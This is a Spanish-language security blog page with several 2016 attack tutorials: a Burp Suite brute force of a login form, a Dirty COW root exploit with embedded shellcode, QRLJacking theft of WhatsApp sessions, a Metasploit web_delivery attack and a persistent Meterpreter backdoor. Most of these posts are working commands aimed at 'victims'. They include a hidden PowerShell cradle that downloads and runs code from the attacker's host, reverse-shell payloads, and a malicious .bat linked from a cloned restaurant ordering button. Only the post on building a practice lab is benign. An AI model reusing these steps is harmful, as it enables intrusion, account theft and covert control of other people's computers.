domingo, 13 de noviembre de 2016

Elaborando un ataque Brute Force en BurpSuite


Saludos nuevamente mis queridos fieles lectores en esta oportunidad les enseñare a elaborar un ataque de fuerza bruta en plataformas web, con Burpsuiete.

Burpsuite es una herramienta creada en java, que tiene como objetivo fundamental auditar cualquier plataforma web, capturando los datos que se envíen para posteriormente ejecutar ataques.

Si deseas aprender a utilizar esta herramienta puedes visitar el siguiente enlace:

http://www.backtrack-omar.com/2015/08/auditando-con-burp-suite-v1612.html


Elaborar un MITM:

http://www.backtrack-omar.com/2015/10/capturando-e-interceptando-datos-de-red.html

Utilizar Burpsuite con Tor

http://www.backtrack-omar.com/2015/11/testing-burpsuite-tor-browser.html

antes de empezar les recomiendo que lean el primer post para que vayan configurando el proxy de Burpsuite en su navegador.


Plataforma para el ataque

como vemos esta plataforma es la escogí para elaborar la prueba de concepto, bueno ya hecho todo lo anteriormente mencionado, añadiremos cualquier credencial, lo importante es darle clip al botón y capturar los datos.

Luego de hacer todo lo siguiente, nos iremos al Burpsuite para ver lo capturado.










vemos que nos arrojo las respuesta que hemos enviado, lo que nosotros unicamente nos importa es la ultima linea:

usuario=admin&contra=123456

esta fue la credencial sin validez que añadí, entonces señalaremos todo el texto, le daremos anticlip y escogeremos la opción "Send Intruder" y nos dirigiremos a la pestaña "Positions":

vemos que se marcan 3 lineas una de Cookie y las de abajo de las credenciales, en nuestro caso nosotros debemos quedarnos con las lineas:

usuario=§admin§&contra=§123456§ 

para ello pueden señalar toda la linea cookie y darle en "Clear $", o simplemente darle "Clear $" sin señalar nada eliminando todo los payloads escogidos por default y señal solamente los parámetros usuario y contra.

si notaron bien en la anterior imagen en la barra de "Attack Type", esta en Sniper, nosotros la cambiaremos por "Cluster Bomb".


debe quedar de la siguiente manera luego de ello entraremos a la pestaña "Payloads"


Deseo aclarar lo siguiente en la barra Payload set, Se activaran la cantidad de payloads escogidos en pestaña "Positions" en nuestro caso fueron "2".

Aquí viene nuestra arma principal nuestro "Diccionario"
le daremos en el boton de abajo donde dice "load" y cargaremos nuestro diccionario.

el primer payload fue "usuario" >> user.txt


El segundo payload fue "contra" >> pass.txt



El proceso se debe repetir para ambos, ya que son payloads diferentes, luego de ello le daremos en el botón "Start attack".

entonces se empezara nuestro ataque de fuerza bruta.


Vemos que estamos elaborando el ataque  y tenemos respuestas "200", que en su mayoría son peticiones comunes estáticas de un modelo.

pero si observamos la linea señalada esta con respuesta "302", significa que hemos entrado a un modelo diferente de donde hemos estado, en ciertas palabras conectándonos al panel administrativo.

Credencial correcta:

usuario=admin&contra=jacky


HTTP/1.1 302 Found
Date: Mon, 14 Nov 2016 01:33:19 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.5.38
X-Powered-By: PHP/5.5.38
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: admin/Administrador.php
Content-Length: 3884
Connection: close
Content-Type: text/html



Esto fue todo amigos, no olviden compartir la pagina y dejar su comentario.
agradecer no cuesta nada.

Saludos!!

Crea tu laborario de Pentesting - Encuentra tu propio 0 Days


Saludos mis fieles lectores en esta oportunidad, a pedidos de algunos seguidores de la fan page, enseñare a como crear tu laboratorio virtual desde tu sistema, cabe decir que los complementos utilizados en este escenario están disponibles para cualquier sistema operativo.


Para cualquier investigador de seguridad la mejor manera de auditar una plataforma es que este alojada en su propio laboratorio de pruebas por excelencia.


Emular sistemas operativos:


En este primer escenario sin duda es uno de los mas importantes en la rama de la seguridad informática, ya que se enfoca principalmente en sistemas públicos y privados, para encontrar fallas que afecten la privacidad de millones de usuarios y a su vez contengan puertas traseras (Backdoors).

Vulnerabilidades como el Shellshock, hasta el ultimo encontrado denominado Dirty COW se han encontrado en laboratorios virtuales por investigadores independientes.


Herramientas de emulación de sistemas operativos:



Vmware



Es una filial de EMC Corporation (propiedad a su vez de Dell Inc) que proporciona software de virtualización disponible para ordenadores compatibles X86. Entre este software se incluyen VMware Workstation, y los gratuitos VMware Server y VMware Player. El software de VMware puede funcionar en Windows, Linux, y en la plataforma mac OS que corre en procesadores Intel, bajo el nombre de VMware Fusion
 

Referencia: 

https://es.wikipedia.org/wiki/VMware


Pagina de descarga:

http://www.vmware.com/



Virtualbox



Oracle VM VirtualBox es un software de virtualización para arquitecturas x86/amd64, creado originalmente por la empresa alemana innotek GmbH.


Referencia:

https://es.wikipedia.org/wiki/VirtualBox

Pagina de descarga:

https://www.virtualbox.org/ 


Estos 2 emuladores mencionados son los mejores y mas utilizados a nivel mundial, puedes emular cualquier sistema operativo.


Sistemas operativos recomendados:


Microsoft Windows

  • Windows XP
  • Windows 7 
  • Windows 8
  • Windows 10

GNU/Linux

  • Ubunto 
  • Debian
  • ArchLinux

Mac OS

  •   Mac OS X Yosemit 

Android

  •   Android 6.0 Marshmallow

Todos los sistemas mencionados los pueden descargar en archivo de imagen .ISO en sus paginas oficiales.

Si deseas explotar algunos fallos encontrados les recomiendo utilizas versiones "Antiguas", y empezar a testar.


Por el momento estos distros los tengo corriendo para mis pruebas de Testing.


Distros vulnerables para pruebas de Penetration Pestesting:

Existen pequeñas organizaciones que han diseñado sus propios sistemas vulnerables una de ellas es For Pentester y Owasp.

Si desean descargar cualquier distro con fallas conocidas corriendo en dicho sistema no dudes en visitar la pagina:

https://pentesterlab.com/

Pero sin duda una de las usadas hasta el momento es metasploitable

Metasploitable es una máquina virtual Linux intencionadamente vulnerables. Esta máquina virtual se puede utilizar para llevar a cabo la formación en seguridad, herramientas de seguridad de prueba, y practicar técnicas de pruebas de penetración común.


Referencia:

https://community.rapid7.com/docs/DOC-1875


Descarga:

https://sourceforge.net/projects/metasploitable/


Auditar plataformas Web

El mundo del internet avanza demasiado tecnológicamente hablando, desde que se crearon plataformas web se optimizaron varios procesos que en la vida cotidiana eran muy molestos como por ejemplo depositar dinero en una cuenta, teníamos que hacer horas de cola, pero ahora no es así desde tu dispositivo móvil o tu ordenador puedes hacer eso en menos de 5 segundos por medio de una plataforma web de tu banca online.


La gran pregunta es: ¿Mis datos son seguros? ¿alguien puede obtener mis credenciales? ¿Hackearon la pagina del banco?

Pues si, estas preguntas son las mas frecuentes que cualquier usuario se preguntaría, entonces viene el gran reto de un investigador de seguridad.

"Reportar fallos que perjudican a los usuarios a nivel mundial y mejorar la seguridad informática día a día".


CMS -  Sistemas de gestión de contenidos

Los CMS o Sistemas de gestión de contenidos son plataformas dedicadas especialmente para crear estructuras de soporte y administración de contenidos, principalmente en paginas web.

Existen varias plataformas las mas conocidas son.

Joomla, Wordpress, Drupal, etc.


Como bien sabemos existen varias vulnerabilidades en Plugins y complementos de los mencionados "CMS", ustedes pueden verificar en esta pagina dedicada a Exploits en todo tipo de plataformas:

https://www.exploit-db.com/


digamos que para un investigador de seguridad web es fundamental tener algunos de estos gestores en su localhost para investigar posibles fallos y encontrar algunos 0days.

Descargar Plugins Joomla:



https://extensions.joomla.org/ 


Descargar Plugins Wordpress:

 

https://es.wordpress.org/plugins/



Joomla

Joomla es un sistema de gestión de contenidos (o CMS, por las siglas en inglés, Content Management System) que permite desarrollar sitios web dinámicos e interactivos. Permite crear, modificar o eliminar contenido de un sitio web de manera sencilla a través de un "panel de administración". Es un software de código abierto, programado o desarrollado en PHP y liberado bajo Licencia pública general GNU (GPL).

Referencia:

https://es.wikipedia.org/wiki/Joomla 
  
Pagina de descarga:

https://www.joomla.org/


Wodpress:



 


WordPress es un sistema de gestión de contenidos o CMS (por sus siglas en inglés, Content Management System) enfocado a la creación de cualquier tipo de sitio. Originalmente alcanzó una gran relevancia usado para la creación de blogs, para convertirse con el tiempo en una de las principales herramientas para la creación de páginas web comerciales.

Referencia:

https://es.wikipedia.org/wiki/WordPress

Pagina de descarga:

https://es.wordpress.com/



Pentesting en plataformas Web

Existen aplicaciones vulnerables web desarrolladas para realizar pruebas de Pentesting, en su mayoría la organización Owasp ha desarrollado buenos ejemplares, como también grupos independientes.


bWAPP





bWAPP, o una aplicación web con errores, es una fuente libre y abierto deliberadamente aplicación web insegura.
Ayuda a entusiastas de la seguridad, los desarrolladores y los estudiantes para descubrir y para prevenir vulnerabilidades web.
bWAPP lo prepara a uno para realizar pruebas de penetración exitosa y proyectos de hacking ético.

Lo que hace tan único bWAPP? Bueno, tiene más de 100 vulnerabilidades web!
Cubre todas las principales web bugs conocidos, incluyendo todos los riesgos del proyecto OWASP Top 10.


Referencia:

https://sourceforge.net/projects/bwapp/


Descarga:

http://www.itsecgames.com/ 




Damn Vulnerable Web Application

Es una aplicación web PHP / MySQL que es maldita vulnerables. Su objetivo principal es ser una ayuda para los profesionales de la seguridad para poner a prueba sus habilidades y herramientas en un entorno jurídico, ayudar a los desarrolladores web a comprender mejor los procesos de asegurar las aplicaciones web y para ayudar tanto a los estudiantes y profesores para aprender acerca de la seguridad de aplicaciones web en una clase controlada ambiente de la sala.

Descarga:

http://www.dvwa.co.uk/

 
SQLi-Labs avanzado


SQLI-LABS es una plataforma para aprender SQLI Siguiendo laboratorios que están cubiertos para parametros GET y POST.

los escenarios son los siguientes:

  •     Error Based Injections (Union Select)
  •     String
  •     Intiger
  •     Error Based Injections (Double Injection Based)
  •     BLIND Injections: 1.Boolian Based 2.Time Based
  •     Update Query Injection.
  •     Insert Query Injections.
  •     Header Injections. 1.Referer based. 2.UserAgent based. 3.Cookie based.
  •     Second Order Injections
  •     Bypassing WAF
  •     Bypassing Blacklist filters Stripping comments Stripping OR & AND    Stripping SPACES and COMMENTS Stripping UNION & SELECT
  •     Impidence mismatch
  •     Bypass addslashes()
  •     Bypassing mysql_real_escape_string. (under special conditions)
  •     Stacked SQL injections.
  •     Secondary channel extraction
Descarga:

https://github.com/Audi-1/sqli-labs


En mi caso, con las plataformas mencionadas doy mis clases y charlas de seguridad informática y te los recomiendo mucho.

como lo dijo un grande de seguridad Informática, el gran chema alonso:

" Leer, Practicar y ser constante. "


Dejare su vídeo dando algunos consejos para empezar en el mundo de la seguridad informática & Hacking.





Saludos y éxitos para todos, no olvides compartir el blog y dejar un comentario.
agradecer no cuesta nada, Saludos.

Dirty COW - CVE-2016-5195 explotando vulnerabilidad en el Kernel de Linux


hace aproximadamente un mes, la comunidad linuxera (incluyéndome) se entero de una noticia que simplemente no se podría creer, un fallo de hace 9 años nuevamente estaba presente exponiendo un gran agujero de seguridad en las versiones: Ubuntu 14.04 y Ubuntu 15.10.

las consecuencias que con lleva son catastróficas, permite al atacante obtener privilegios root de manera remota, exponiendo todo el sistema de la victima sin ninguna excepción.

el bug también afecta a todos los dispositivos android de la versión 7 para abajo.


Elevando privilegios de usuario a root en Ubuntu 15.10

Exploit:

https://www.exploit-db.com/exploits/40616/

Lo primero que debemos hacer ver la fuente del archivo en 40616.c, lo puede hacer en cualquier editor de texto, en mi caso lo abrí por Sublime Text, para que puedan ver lo principal. 


Vemos que el exploit esta generado en msfvenom quiere decir que es un payload.

Este exploit funciona de la siguiente manera, notaron que hay 2 payloads de 64 y 32 bits, por default el de 64bits esta sin comentarios cabe decir que funcionara solamente para esa arquitectura, ya que el de 32 bits esta comentado y no ejercerá ninguna función.


64bits

/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/
unsigned char sc[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
  0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
  0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
  0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
  0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;


32bits


/*
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
unsigned char sc[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
  0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
  0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
  0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
  0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
  0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
  0x89, 0xe1, 0xcd, 0x80
};
unsigned int sc_len = 136;
*/


En esta prueba de concepto, estoy exponiendo un sistema "UBUNTU 32BITS", cabe decir que eliminare el payload de 64 bits con todos sus atributos, para quedarme solamente con la arquitectura de 32bits:


ojo: también eh eliminado los comentarios del payloads de 32 bits.

luego de guárdalo pasaremos a compilar el archivo .c

[email protected]:~# gcc 40616.c -o 40616 -pthread

Una ves compilado correctamente, podemos subirlo al servidor de la victima creo que no hay necesidad de pasar a ese proceso ya que existen muchas maneras de hacerlo, si no sabes te invito a buscar los artículos de metasploit framework, en el blog.

Ustedes pueden crear su payload en formato linux, ya que deben hacerlo para poder ejecutar formatos compilados con permisos.


Creando payload en linux 32bits

[email protected]:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.35 LPORT=8081 -f elf > /root/Desktop/shell.elf


Estableciendo conexión meterpreter 

msf > use multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.35
msf exploit(handler) > set LPORT 8081
msf exploit(handler) > exploit


Entonces le enviaremos nuestro payload a nuestra victima, en el momento que la victima ejecute tendremos su sesión meterpreter:


entramos a terminal y ejecutamos el "Exploit", vemos que se ejecuto correctamente, hemos escalado los privilegios root y por ende tenemos todos los permisos.


Siempre es bueno enseñar pruebas de todo, ejecutaremos el exploit en la misma maquina con un usuario llamado prueba:

./40616

El exploit funciono correctamente, esto fue todo estimados lectores espero les halla encantado este post.

Saludos y bendiciones.

sábado, 12 de noviembre de 2016

QRLJacking - Robando sesión de WhatsApp por Codigo QR





Saludos fieles lectores en esta oportunidad les traigo  una nueva herramienta salida del horno, que nos permite optimizar el proceso de robo de sesión por medio del código QR, hace una semana tuve un pequeño concurso en mi salón entre 3 proyectos innovadores, yo había elaborado un Software de identificación de medidas dactilares creado en Csharp conectado a un motor de base de datos como "SQL SERVER"  + SDK digital personal, por lo cual tenia 2 grandes rivales.

un proyecto de realidad aumentada y otro basado en suscripción e inicio de sesión de usuarios por medio de código QR.

El ultimo día de exposición era un debate, en la cual se tenia que ver la manera de como matar el proyecto del contrincante buscando que fallas puede tener, entonces comente sobre el Robo de sesiones QRJacking.
los sistemas de autenticación basado en código QR que permite a los usuarios suscribirse rápidamente en una página web sin tener que memorizar o escribir cualquier nombre de usuario o contraseña.

Los códigos QR son códigos de barras bidimensionales que contienen una cantidad significativa de información tal como una cookie o clave de sesión compartida.


Entonces me puse a pensar, como le explico de manera entendible a mis compañeros de clase y mis docentes que desconocen el tema, entonces recordé la herramienta llamada  QRLJacking, que nos permite automatizar este proceso.


Descarga:

[email protected]:~#  git clone https://github.com/OWASP/QRLJacking.git

[email protected]:~#  cd QRLJacking/QrlJacking-Framework
[email protected]:~#  pip install -r requirements.txt


Luego de haber descargado los archivos e instalado los requerimientos de las librerias en python, pasaremos a ejecutarlo:

[email protected]:~#  python QRLJacker.py


Lo que haremos sera añadir la opción nuevo 1, Chat Applications, nuevamente escogeremos la opción 1 que es "WhatsApp", luego de ello nos aparecerá lo siguiente :

Port to listen on (Default 1337) :

Nos dice que puerto de escucha deseamos agregar para que corre la plataforma, en mi caso le añadí el puerto 8081.

Muy bien una ves hecho todo el procedimiento les saldra lo siguiente:


vemos que nos abrió una pestaña en firefox con la web original: https://web.whatsapp.com/

de igual manera en la terminal vemos que se generan varios reemplazos del archivo tmp.png, para resumir esto es que en la plataforma de whatsapp web cada 10 segundos se genera otro nuevo código QR por ende otra imagen y QRLJacking actualiza esa imagen en vivo para que la conexión sea exitosa.

Entonces como esta es una prueba de Test, deje la index.html de whatssap generado por QRLJacking por default.

si ustedes desean editarla es demasiado sencilla, se van al siguiente directorio:

[email protected]:~#  cd QRLJacking/QrlJacking-Framework


Entonces una ves que mi victima abra la pestaña de mi servidor malicioso, empezara a escanear el código :



En el momento precioso que la victima escanee el código, nosotros tendremos su sesión en segundo plano:

Muy sencillo verdad, ahora tu te preguntaras como mandar su servidor malicioso a tus vecinos que estén conectados a tu red, muy simple puedes ejecutar un MITM - dnspoof.

Con bettercap, MITMF, Xerosploit, Pythem!, hasta con el mismo Ettercap, si deseas ownear el sistema de tu victima te recomiendo utilizar Beef con cualquiera de las herramientas mencionadas y hacer la redirección en dicho framework:


Les dejare 2 posts,donde enseño a elaborar un MITM y utilizar el framework:


http://www.backtrack-omar.com/2015/10/mitm-man-in-middle-ettercap-mitmf-beef.html

http://www.backtrack-omar.com/2015/10/beef-browser-exploitation-framework.html

Saludos!!!!!!


Backdorizando Windows por medio de Web Delivery - Metasploit

Saludos nuevamente mis queridos fieles lectores, en esta oportunidad les traigo un nuevo método de ataque de POST EXPLOTACIÓN por medio de un modulo llamado Web Delivery, que nos permite crear archivos "Maliciosos" con extensiones Python, php y powershell,  en este tutorial utilizaremos la extensión universal por defecto de windows ps - Powershell.

Primero arrancaremos el framework metasploit, luego configuraremos el respectivo exploit:


--------------------------------------------------------------------------------------------------------------------------------
msf > use exploit/multi/script/web_delivery - Estableciendo Web Delivery
LHOST => 192.168.1.35                              - Nuestra IP
LPORT => 8081                                           - Nuestro puerto de escucha
msf exploit(web_delivery) > set URIPATH / - Directorio PATH del servidor
msf exploit(web_delivery) > show targets  
msf exploit(web_delivery) > set target 2     - Escogimos 2 = PowerShell

msf exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > exploit

--------------------------------------------------------------------------------------------------------------------------------
una ves entendido lo anterior, lo que hicimos fue crear nuestro servidor meterpreter en escucha y nos apareció lo siguiente en las lineas abajo


powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://192.168.1.35:8080/yfHKAPLfG');

Algunos quizás no tengan entendimiento de ello, se los simplificare de la siguiente manera, este es el código fuente del archivo powershell que nos permitirá obtener la conexión de nuestra victima una ves que ejecute dicho archivo.





Como vemos este archivo lo eh guardado en formato .bat, para camuflarlo de algunos AV, lo llame "hola.bat" y lo aloje a la carpeta: /var/www/html donde se almacena nuestro archivos del servidor local apache.

¿Ustedes se preguntaran porque?

Es simple porque pienso utilizar un index de una pagina de "Ventas" online de comida y adjuntar mi archivo infectado .bat en un botón. 

Antes de pasar este proceso, activen su servidor apache:

[email protected]:/# service apache2  start



Les dejare un pequeño ejemplo:

Source original:

<input name="input" value="" onclick="setLocation('http://www.bembos.com.pe/promociones-online/promo-clasica')" type="button">

Source editado

<input name="input" value="" onclick="setLocation('192.168.1.35/hola.bat')" type="button">

solamente le reemplazan la URL original por su dirección de archivo.

Una vez hecho todo este proceso, le envían la URL a su victima en mi caso yo lo estoy asiendo en mi red local, ustedes pueden hacerlo desde una web externa si desean.

Como vemos en el momento que nuestra victima haga clic en el botón automáticamente se descargara nuestro archivo "hola.bat", entonces aquí viene lo mejor  "La curiosidad del ser humano, cuando se presenta una oportunidad", quiere decir que una ves la victima ejecute el archivo, tendremos su sesión meterpreter.








Espero hallan aprendido algo nuevo de este servidor, para mi es un placer enseñarle lo poco que se.


Saludos y éxitos!


viernes, 11 de noviembre de 2016

Creando Backdoor Persistente en metasploit


Saludos fieles lectores en esta oportunidad les traigo un POST sobre como crear tu Backdoor persistente en msfconsole, ha pedido de un seguidor del blog que me dejo un mensaje en privado.


¿Que es Backdoor?

Se le domina como puerta trasera que se ejecuta mediante un "Script" remoto a la maquina de la victima con conexión puente al ordenador del atacante, dejando el sistema siempre en escucha.

El Backdoor persistente es compatible con todas las versiones de Windows.


Lo primero que deben tener en cuenta es lo siguiente, penetrar el sistema de tu victima, dejo los siguientes posts donde enseño como hacerlo por diferentes métodos, de igual manera burlar los "AV":

 http://www.backtrackomar.com/2014/01/aprendiendo-metasploit-avanzado.html
http://www.backtrackomar.com/2015/09/2015-flash-0day-exploit-hackingteam.html
http://www.backtrackomar.com/2015/10/mitm-man-in-middle-ettercap-mitmf-beef.html
http://www.backtrackomar.com/2015/10/beef-browser-exploitation-framework.html
http://www.backtrackomar.com/2015/10/vnc-remote-connection-all-windows.html
http://www.backtrackomar.com/2016/02/dump-skype-account-our-victim-for.html
http://www.backtrackomar.com/2016/02/bypassear-privilegios-uac-win-10-8-81.html
http://www.backtrackomar.com/2015/10/evadiendo-av-codificando-payloads-con.html
http://www.backtrackomar.com/2015/03/las-viejas-macros-siempre-en-accion.html
http://www.backtrackomar.com/2015/10/unicorn-la-herramienta-de-infeccion.html
http://www.backtrackomar.com/2016/02/send-video-youtube-victim-with.html
http://www.backtrackomar.com/2016/02/compilando-nuestros-payloads-in.html

Luego de crear tu "Payload", posteriormente enviar el archivo infectado a tu victima tendremos su session meterpreter, en este caso haré la prueba de concepto en un Windows 7 service pack 1 

Entonces lo que haremos sera ejecutar el comando persistente por default.

meterpreter > run persistence

voy a dejar bien claro lo siguiente, al ejecutar el comando run persistente estas dejando todo por Default, por ejemplo:

El puerto: 4444
IP: 192.168.1.35 (tu IP se adjuntara automáticamente)
Script Upload - directorio donde se alojara el Script vbs, que se ejecutara al momento que inicie el sistema de la victima.

Como vemos el archivo se subió correctamente en la carpeta por default.

Entonces reiniciaremos el equipo de la victima para ver si realmente nos carga  su sesión meterpreter, pero antes configuraremos el puerto de escucha, ya que en la infección se utilizo el puerto 5555. 

Esperemos que cargue nuevamente el sistema windows, pero vemos en la siguiente imagen que hemos cambiado el puerto de escucha reemplazando el 5555 a 4444 que fue generado al momento de ejecutar persistence.

Como podemos observar automáticamente hemos tenido la conexión meterpreter.

ahora viene la pregunta de muchos:

¿si yo deseo establecer una IP y puerto diferente?

Pues sencillo vamos a utilizar algunos argumentos de persitence, un ejemplo es el siguiente:

run persistence -U -i 5 -p 4444 -r 192.168.1.35

-U >> ejecuta automáticamente el usuario comprometido y establece logs.
-i  >> segundos de conexión para establecer.
-p >> puerto de escucha.
-r >> IP de la maquina del atacante a añadir.

Entonces le añadí de igual manera el puerto 4444, y deje mi IP estatica por default, ya que es mi maquina de ataque:

Reinicie bruscamente el windows 7, entonces esperaremos a que cargue nuevamente.  


de igual manera hemos tenido su sesión meterpreter automáticamente, configurando nuestro propio script persistente.

Saludos!




Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares